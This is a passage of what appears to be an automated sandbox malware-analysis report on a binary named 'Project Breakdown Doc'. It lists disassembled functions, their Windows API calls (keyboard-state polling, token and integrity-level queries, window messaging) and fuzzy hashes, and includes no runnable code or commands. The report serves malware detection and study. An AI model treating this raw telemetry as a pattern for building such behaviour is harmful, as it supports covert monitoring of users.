                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00CAE8B3
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00CAE8F2
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00CAE917
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00CAE91F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: 39b1ad2a4d8cb12b04c63c690daef105c304ec160bc3ddf46d18211c2ec8b47b
                                                  • Instruction ID: 6ca9b212e6b25157fe8287c1eccdfbb424c945ef4d44dafd404d5d1e20bedfb5
                                                  • Opcode Fuzzy Hash: 39b1ad2a4d8cb12b04c63c690daef105c304ec160bc3ddf46d18211c2ec8b47b
                                                  • Instruction Fuzzy Hash: 6F511E35A00215DFCF11EF64C981AAEBBF5FF49314B148099E849AB362CB31ED51EB91
                                                  Function 00CCA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94feebed9bb4a380e511a09d77865734a714bbf29693f70201fd435553af3d00
                                                  • Instruction ID: 39d5866db37f479307e0929c2549212863a8cfb422e3c8893a346b09e9707659
                                                  • Opcode Fuzzy Hash: 94feebed9bb4a380e511a09d77865734a714bbf29693f70201fd435553af3d00
                                                  • Instruction Fuzzy Hash: F141D23590024CAFC724DF28CC5CFA9BBA5EB09314F184169F965E72E1D770EE41DA61
                                                  Function 00C42344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00C42357
                                                  • ScreenToClient.USER32(00D067B0,?), ref: 00C42374
                                                  • GetAsyncKeyState.USER32(00000001), ref: 00C42399
                                                  • GetAsyncKeyState.USER32(00000002), ref: 00C423A7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AsyncState$ClientCursorScreen
                                                  • String ID:
                                                  • API String ID: 4210589936-0
                                                  • Opcode ID: 25313c974ecfce66f9c5651911b4fd5d21628503846a32fe3742bb37488467d4
                                                  • Instruction ID: 1e3a57f4ebbd39f29956925ea0b55c1e4ac232417cf9532dec8df7b854ba61af
                                                  • Opcode Fuzzy Hash: 25313c974ecfce66f9c5651911b4fd5d21628503846a32fe3742bb37488467d4
                                                  • Instruction Fuzzy Hash: A541823550411AFBDF159F69C884FEDBB78FB05320F60836AF838962A1C7345A90EB91
                                                  Function 00C96920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9695D
                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00C969A9
                                                  • TranslateMessage.USER32(?), ref: 00C969D2
                                                  • DispatchMessageW.USER32(?), ref: 00C969DC
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C969EB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                  • String ID:
                                                  • API String ID: 2108273632-0
                                                  • Opcode ID: 949f3a07d715538119936cd63310a9c22314446acc0e058dd11d04242f08979e
                                                  • Instruction ID: da4164a666cfa9a49b81f5260326810137dafa22cedfc8fd0d27564b499acb4b
                                                  • Opcode Fuzzy Hash: 949f3a07d715538119936cd63310a9c22314446acc0e058dd11d04242f08979e
                                                  • Instruction Fuzzy Hash: A231A071900246AEDF208F75DC48FBA7BACAB01304F154169E425D72E1DB34D99AE7A0
                                                  Function 00C98F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00C98F12
                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00C98FBC
                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C98FC4
                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00C98FD2
                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C98FDA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleep$RectWindow
                                                  • String ID:
                                                  • API String ID: 3382505437-0
                                                  • Opcode ID: 2535b8b5fdc4538445240c2710f5e1f9946b4fa70e8b56a9d6f0cf73db7dee9c
                                                  • Instruction ID: 4e8d2091704a09f947c58e03af655ed57f121ff521af205d1314612ec76972dc
                                                  • Opcode Fuzzy Hash: 2535b8b5fdc4538445240c2710f5e1f9946b4fa70e8b56a9d6f0cf73db7dee9c
                                                  • Instruction Fuzzy Hash: FA31CE71500219EFDF14CFA8D94CBAE7BB6EB05315F104229F925EB2D0C7B09A18DB90
                                                  Function 00C9B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00C9B6C7
                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C9B6E4
                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C9B71C
                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C9B742
                                                  • _wcsstr.LIBCMT ref: 00C9B74C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                  • String ID:
                                                  • API String ID: 3902887630-0
                                                  • Opcode ID: ca255e2c8cf3657dc60f94cf9fb88af9c542a47049c93423f40590eea697c402
                                                  • Instruction ID: 05f8f6cac9a12f7ccf51076f4e16bbdf3fd91542583f98d88d8ae2801af15431
                                                  • Opcode Fuzzy Hash: ca255e2c8cf3657dc60f94cf9fb88af9c542a47049c93423f40590eea697c402
                                                  • Instruction Fuzzy Hash: A921F531204204BAEF255B79ED8DE7B7BA9DF85710F04413DFC05CA1A1EB61DD4196A0
                                                  Function 00CCB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00CCB44C
                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00CCB471
                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CCB489
                                                  • GetSystemMetrics.USER32(00000004), ref: 00CCB4B2
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00CB1184,00000000), ref: 00CCB4D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$MetricsSystem
                                                  • String ID:
                                                  • API String ID: 2294984445-0
                                                  • Opcode ID: a87de57041e5cba7a8b58c7c4182bb1d194d1375f4e6d49074599ad6b7d28909
                                                  • Instruction ID: 284b68f69d4d3e128fce726b1bb53296ccfb081687f552cbc13cf18f23d8c230
                                                  • Opcode Fuzzy Hash: a87de57041e5cba7a8b58c7c4182bb1d194d1375f4e6d49074599ad6b7d28909
                                                  • Instruction Fuzzy Hash: 35216B31918215AFCB18CFB9DC05F6A3BA5EB05720F14862CF936D72E2E7309D219B90
                                                  Function 00C997E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C99802
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C99834
                                                  • __itow.LIBCMT ref: 00C9984C
                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C99874
                                                  • __itow.LIBCMT ref: 00C99885
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$__itow$_memmove
                                                  • String ID:
                                                  • API String ID: 2983881199-0
                                                  • Opcode ID: 67a1930607702ccf9d43894e4fe0ee1b48ceada379481e6f7eded84bfc304acf
                                                  • Instruction ID: 98001641557291359d8294aa2101f4799b80e108f2128a1d1b22aed25f1b99ae
                                                  • Opcode Fuzzy Hash: 67a1930607702ccf9d43894e4fe0ee1b48ceada379481e6f7eded84bfc304acf
                                                  • Instruction Fuzzy Hash: 18218371A01248ABDF109B69CC8AFAE7BB9EF4A710F04402DF905DB291D6708D45D795
                                                  Function 00C412F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C4134D
                                                  • SelectObject.GDI32(?,00000000), ref: 00C4135C
                                                  • BeginPath.GDI32(?), ref: 00C41373
                                                  • SelectObject.GDI32(?,00000000), ref: 00C4139C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ObjectSelect$BeginCreatePath
                                                  • String ID:
                                                  • API String ID: 3225163088-0
                                                  • Opcode ID: 3618dc0658e252dba587ece831d3957ce598aef86da0e38528f8e3aca747f2e2
                                                  • Instruction ID: ba92f07a3d6d6aab24005081885a2f2edbec1dc3d5b3af93b2b20f4016a72a81
                                                  • Opcode Fuzzy Hash: 3618dc0658e252dba587ece831d3957ce598aef86da0e38528f8e3aca747f2e2
                                                  • Instruction Fuzzy Hash: 0C210C70900308EBDB119F25DC08B697BF9FB00761F58822AF968D66F0D771D9A1DBA1
                                                  Function 00C9C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: e4bd2bb905355c4a46bc6c14b7397672fd82aff537fd063eb9350d96d8ab5984
                                                  • Instruction ID: 087493fb5aec08a706028f7ed71cf91a2cd29a3d48e6f78d94fbaff6af9f9652
                                                  • Opcode Fuzzy Hash: e4bd2bb905355c4a46bc6c14b7397672fd82aff537fd063eb9350d96d8ab5984
                                                  • Instruction Fuzzy Hash: F401B5B16041057BEA14A6219DC6FAF735CDB61394F484022FE1497383E690DF11D2F8
                                                  Function 00CA4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 00CA4D5C
                                                  • __beginthreadex.LIBCMT ref: 00CA4D7A
                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00CA4D8F
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00CA4DA5
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00CA4DAC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                  • String ID:
                                                  • API String ID: 3824534824-0
                                                  • Opcode ID: 7483ee12d29fa70a7c848a6032ab614cf17907799e12902800a9bbbc0479ce65
                                                  • Instruction ID: 81986a650e2955498b38ec32df4189a9c1b9d8207416daf467cd6d9c14ef408a
                                                  • Opcode Fuzzy Hash: 7483ee12d29fa70a7c848a6032ab614cf17907799e12902800a9bbbc0479ce65
                                                  • Instruction Fuzzy Hash: 8C11E1B2904249BFC7159BB8DC08BAE7FADEB86324F144269F928D3350D6B1CD0087B0
                                                  Function 00C9874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C98766
                                                  • GetLastError.KERNEL32(?,00C9822A,?,?,?), ref: 00C98770
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00C9822A,?,?,?), ref: 00C9877F
                                                  • HeapAlloc.KERNEL32(00000000,?,00C9822A,?,?,?), ref: 00C98786
                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C9879D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 842720411-0
                                                  • Opcode ID: d9b9cc48fae98399b9d04a7c02c80ebcd609f29607f246ad4b921db46559b61e
                                                  • Instruction ID: cfe4fbfe7b0bf6b6bd93d78541583689ccb3ce21215af68e91b4c3e432c2ebe3
                                                  • Opcode Fuzzy Hash: d9b9cc48fae98399b9d04a7c02c80ebcd609f29607f246ad4b921db46559b61e
                                                  • Instruction Fuzzy Hash: F201F671601204FFDB204FA6DC8CE6F7FAEEF8A755B200569F859C3260DA359D05DA60
                                                  Function 00CA54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA5502
                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CA5510
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA5518
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CA5522
                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA555E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                  • String ID:
                                                  • API String ID: 2833360925-0
                                                  • Opcode ID: 1cca9b3f5a64861c2b151537ffcd8dfed09ac9b774c9414472156e6865f43d5e
                                                  • Instruction ID: 7c48800e37d17978a8782aa98f5ec897390cdb8e9188237bcf7e011312555478
                                                  • Opcode Fuzzy Hash: 1cca9b3f5a64861c2b151537ffcd8dfed09ac9b774c9414472156e6865f43d5e
                                                  • Instruction Fuzzy Hash: A5011B75D00A1ADBCF04EFE9E888BEDBB79BB0A715F05405AE901B2150DB305655CBA1
                                                  Function 00C97652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?,?,00C9799D), ref: 00C9766F
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?), ref: 00C9768A
                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?), ref: 00C97698
                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?), ref: 00C976A8
                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C9758C,80070057,?,?), ref: 00C976B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                  • String ID:
                                                  • API String ID: 3897988419-0
                                                  • Opcode ID: 3ae0c1e9ff9851e5ecf41e06f160fe6f5882b8650134deab1f3d01cdff7b7e35
                                                  • Instruction ID: 80881e012ae6565016ad55e691d7fa1234ef7d53861d7904a2f701a18d8ee81f
                                                  • Opcode Fuzzy Hash: 3ae0c1e9ff9851e5ecf41e06f160fe6f5882b8650134deab1f3d01cdff7b7e35
                                                  • Instruction Fuzzy Hash: 79017CB2616604BBDF109F69DC48FAE7BBEEB49751F140128FD04D2221E771DE429BA0
                                                  Function 00C985F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C98608
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C98612
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C98621
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C98628
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C9863E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: a574675ef58152bd9d063400d6aeb2c2bcd0895a01585c361c112aeee6364afe
                                                  • Instruction ID: a1cb544f5c4ab823492cc8f5204dc9614881fca23d51d43eab446fd01294fa3b
                                                  • Opcode Fuzzy Hash: a574675ef58152bd9d063400d6aeb2c2bcd0895a01585c361c112aeee6364afe
                                                  • Instruction Fuzzy Hash: 02F03731201204AFEB100FA5DC8DF6F3BADEF8AB54B04042AF9498B160CA659D46DA60
                                                  Function 00C98652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C98669
